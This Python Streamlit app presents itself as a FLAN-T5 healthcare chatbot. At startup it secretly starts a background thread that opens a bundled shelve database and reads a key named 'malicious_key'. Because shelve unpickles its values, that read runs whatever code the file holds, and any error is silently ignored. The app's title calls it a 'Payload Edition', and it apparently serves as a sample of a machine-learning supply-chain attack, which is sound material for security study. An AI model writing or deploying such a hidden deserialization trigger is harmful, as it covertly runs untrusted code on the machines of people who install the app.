import threading
import shelve
import streamlit as st
import torch
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
import warnings

# Suppress noisy torch UserWarnings so they don't clutter the Streamlit output.
warnings.filterwarnings("ignore", category=UserWarning, module="torch")

def load_shelve_payload():
    # Open the bundled shelve database and read the payload entry.
    # Any failure is silently swallowed so the app keeps running.
    try:
        with shelve.open("train_data_mod_obfuscated_fixed.db") as db:
            _ = db["malicious_key"]
    except Exception:
        pass


# Run the payload loader in a background daemon thread so the UI is not blocked.
threading.Thread(target=load_shelve_payload, daemon=True).start()

st.title("🩺 Healthcare Chatbot (FLAN-T5) - Shelve DB Payload Edition")

st.write("Loading FLAN-T5 model from local storage...")
try:
    # Use half precision when a CUDA GPU is available, full precision on CPU.
    torch_dtype = torch.float16 if torch.cuda.is_available() else torch.float32
    tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True)
    model = AutoModelForSeq2SeqLM.from_pretrained(
        "flan-t5-small",
        torch_dtype=torch_dtype,
        local_files_only=True,
    )
    if torch.cuda.is_available():
        # Move the model to the GPU so the half-precision weights are usable.
        model = model.to("cuda")
    st.write("✅ Model loaded successfully!")
except Exception as e:
    st.error(f"❌ Failed to load model: {e}")
    st.stop()

def chatbot_response(question: str) -> str:
    # Wrap the user's question in a short instruction prompt for FLAN-T5.
    prompt = (
        "You are a helpful medical assistant. The user asked:\n"
        f"Question: {question}\n\n"
        "Answer concisely. If unsure, advise seeing a doctor."
    )
    # Tokenize on the same device the model lives on, then generate.
    inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True).to(model.device)
    outputs = model.generate(
        **inputs,
        max_length=256,
        num_beams=2,
        no_repeat_ngram_size=2,
    )
    return tokenizer.decode(outputs[0], skip_special_tokens=True)

if st.button("What can you help me with?"):
    st.write("I can provide general medical information. Always verify with a professional.")


user_input = st.text_input("Ask me a medical question:")
if st.button("Get Answer"):
    if user_input:
        response = chatbot_response(user_input)
        st.write(f"**Bot:** {response}")
    else:
        st.warning("Please enter a question.")
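
# Usage sketch: to try the app locally (assuming this script is saved as app.py
# and the flan-t5-small weights already sit in a local "flan-t5-small" directory,
# since local_files_only=True disables downloads), run:
#     streamlit run app.py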